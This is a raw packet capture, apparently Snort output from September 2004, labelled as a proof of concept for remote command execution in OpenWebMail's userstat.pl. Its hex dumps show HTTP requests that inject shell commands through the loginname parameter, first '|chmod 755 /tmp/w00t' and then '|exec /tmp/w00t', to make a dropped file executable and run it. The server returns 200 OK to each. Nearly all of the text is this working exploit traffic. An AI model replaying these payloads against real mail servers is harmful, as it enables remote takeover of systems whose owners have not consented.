=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:38.908162 62.111.240.132:36368 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF *****R** Seq: 0x899AD808 Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:39.082972 62.111.240.132:36369 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:3244 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x8A5FC246 Ack: 0x24D38331 Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763023103 1991970262 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:39.089696 62.111.240.132:36369 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:3245 IpLen:20 DgmLen:306 DF ***AP*** Seq: 0x8A5FC246 Ack: 0x24D38331 Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763023103 1991970262 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 70 65 GET /cgi-bin/ope 6E 77 65 62 6D 61 69 6C 2F 75 73 65 72 73 74 61 nwebmail/usersta 74 2E 70 6C 3F 6C 6F 67 69 6E 6E 61 6D 65 3D 7C t.pl?loginname=| 63 68 6D 6F 64 25 32 30 37 35 35 25 32 30 2F 74 chmod%20755%20/t 6D 70 2F 77 30 30 74 20 48 54 54 50 2F 31 2E 30 mp/w00t HTTP/1.0 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F ..User-Agent: Mo 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 zilla/4.0 (compa 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B tible; MSIE 6.0; 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 29 Windows NT 5.1) 0D 0A 48 6F 73 74 3A 20 32 34 2E 32 2E 31 35 33 ..Host: 24.2.153 2E 31 36 38 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F .168..Pragma: no 2D 63 61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69 -cache..Connecti 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65 on: close..Conte 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 nt-Type: applica 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D tion/x-www-form- 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 0D 0A urlencoded.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:39.089725 10.1.1.100:80 -> 62.111.240.132:36369 TCP TTL:64 TOS:0x0 ID:36280 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x24D38331 Ack: 0x8A5FC344 Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991970448 763023103 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.160629 10.1.1.100:80 -> 62.111.240.132:36369 TCP TTL:64 TOS:0x0 ID:36281 IpLen:20 DgmLen:238 DF ***AP*** Seq: 0x24D38331 Ack: 0x8A5FC344 Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991978520 763023103 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 31 33 20 53 .Date: Mon, 13 S 65 70 20 32 30 30 34 20 31 39 3A 30 35 3A 33 39 ep 2004 19:05:39 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap 61 63 68 65 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F ache..Pragma: no 2D 63 61 63 68 65 0D 0A 43 61 63 68 65 2D 63 6F -cache..Cache-co 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 2C ntrol: no-cache, 6E 6F 2D 73 74 6F 72 65 0D 0A 43 6F 6E 6E 65 63 no-store..Connec 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E tion: close..Con 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 tent-Type: appli 63 61 74 69 6F 6E 2F 78 2D 6A 61 76 61 73 63 72 cation/x-javascr 69 70 74 0D 0A 0D 0A 2F 2F 0A ipt....//. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.161627 10.1.1.100:80 -> 62.111.240.132:36369 TCP TTL:64 TOS:0x0 ID:36282 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x24D383EB Ack: 0x8A5FC344 Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991978521 763023103 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.335709 62.111.240.132:36369 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:3246 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x8A5FC344 Ack: 0x24D383EB Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763023928 1991978520 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.338169 62.111.240.132:36369 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:3247 IpLen:20 DgmLen:52 DF ***A*R** Seq: 0x8A5FC344 Ack: 0x24D383EB Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763023928 1991978520 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.339181 62.111.240.132:36370 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:205 IpLen:20 DgmLen:60 DF ******S* Seq: 0x8AE4D2F5 Ack: 0x0 Win: 0x16D0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 763023928 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.339227 10.1.1.100:80 -> 62.111.240.132:36370 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x24725205 Ack: 0x8AE4D2F6 Win: 0x16A0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 1991978698 763023928 TCP Options => NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.342713 62.111.240.132:36369 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF *****R** Seq: 0x8A5FC344 Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.500442 62.111.240.132:36370 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:206 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x8AE4D2F6 Ack: 0x24725206 Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763023946 1991978698 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.506647 62.111.240.132:36370 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:207 IpLen:20 DgmLen:299 DF ***AP*** Seq: 0x8AE4D2F6 Ack: 0x24725206 Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763023946 1991978698 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 70 65 GET /cgi-bin/ope 6E 77 65 62 6D 61 69 6C 2F 75 73 65 72 73 74 61 nwebmail/usersta 74 2E 70 6C 3F 6C 6F 67 69 6E 6E 61 6D 65 3D 7C t.pl?loginname=| 65 78 65 63 25 32 30 2F 74 6D 70 2F 77 30 30 74 exec%20/tmp/w00t 20 48 54 54 50 2F 31 2E 30 0D 0A 55 73 65 72 2D HTTP/1.0..User- 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 Agent: Mozilla/4 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 .0 (compatible; 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 6F 77 MSIE 6.0; Window 73 20 4E 54 20 35 2E 31 29 0D 0A 48 6F 73 74 3A s NT 5.1)..Host: 20 32 34 2E 32 2E 31 35 33 2E 31 36 38 0D 0A 50 24.2.153.168..P 72 61 67 6D 61 3A 20 6E 6F 2D 63 61 63 68 65 0D ragma: no-cache. 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F .Connection: clo 73 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 se..Content-Type 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D : application/x- 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F www-form-urlenco 64 65 64 0D 0A 0D 0A ded.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:47.506676 10.1.1.100:80 -> 62.111.240.132:36370 TCP TTL:64 TOS:0x0 ID:32106 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x24725206 Ack: 0x8AE4D3ED Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991978866 763023946 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:55.577196 10.1.1.100:80 -> 62.111.240.132:36370 TCP TTL:64 TOS:0x0 ID:32107 IpLen:20 DgmLen:257 DF ***AP*** Seq: 0x24725206 Ack: 0x8AE4D3ED Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991986937 763023946 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 31 33 20 53 .Date: Mon, 13 S 65 70 20 32 30 30 34 20 31 39 3A 30 35 3A 34 37 ep 2004 19:05:47 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap 61 63 68 65 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F ache..Pragma: no 2D 63 61 63 68 65 0D 0A 43 61 63 68 65 2D 63 6F -cache..Cache-co 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 2C ntrol: no-cache, 6E 6F 2D 73 74 6F 72 65 0D 0A 43 6F 6E 74 65 6E no-store..Conten 74 2D 4C 65 6E 67 74 68 3A 20 33 0D 0A 43 6F 6E t-Length: 3..Con 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close.. 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 Content-Type: ap 70 6C 69 63 61 74 69 6F 6E 2F 78 2D 6A 61 76 61 plication/x-java 73 63 72 69 70 74 0D 0A 0D 0A 2F 2F 0A script....//. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:55.577347 10.1.1.100:80 -> 62.111.240.132:36370 TCP TTL:64 TOS:0x0 ID:32108 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x247252D3 Ack: 0x8AE4D3ED Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 1991986937 763023946 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:55.735138 62.111.240.132:36370 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:208 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x8AE4D3ED Ack: 0x247252D3 Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763024770 1991986937 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:55.736590 62.111.240.132:36370 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:209 IpLen:20 DgmLen:52 DF ***A*R** Seq: 0x8AE4D3ED Ack: 0x247252D3 Win: 0x1920 TcpLen: 32 TCP Options (3) => NOP NOP TS: 763024770 1991986937 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/13-15:05:55.739713 62.111.240.132:36370 -> 10.1.1.100:80 TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF *****R** Seq: 0x8AE4D3ED Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+[1]. PoC for OpenWebMail Remote Command Execution (Userstat.pl)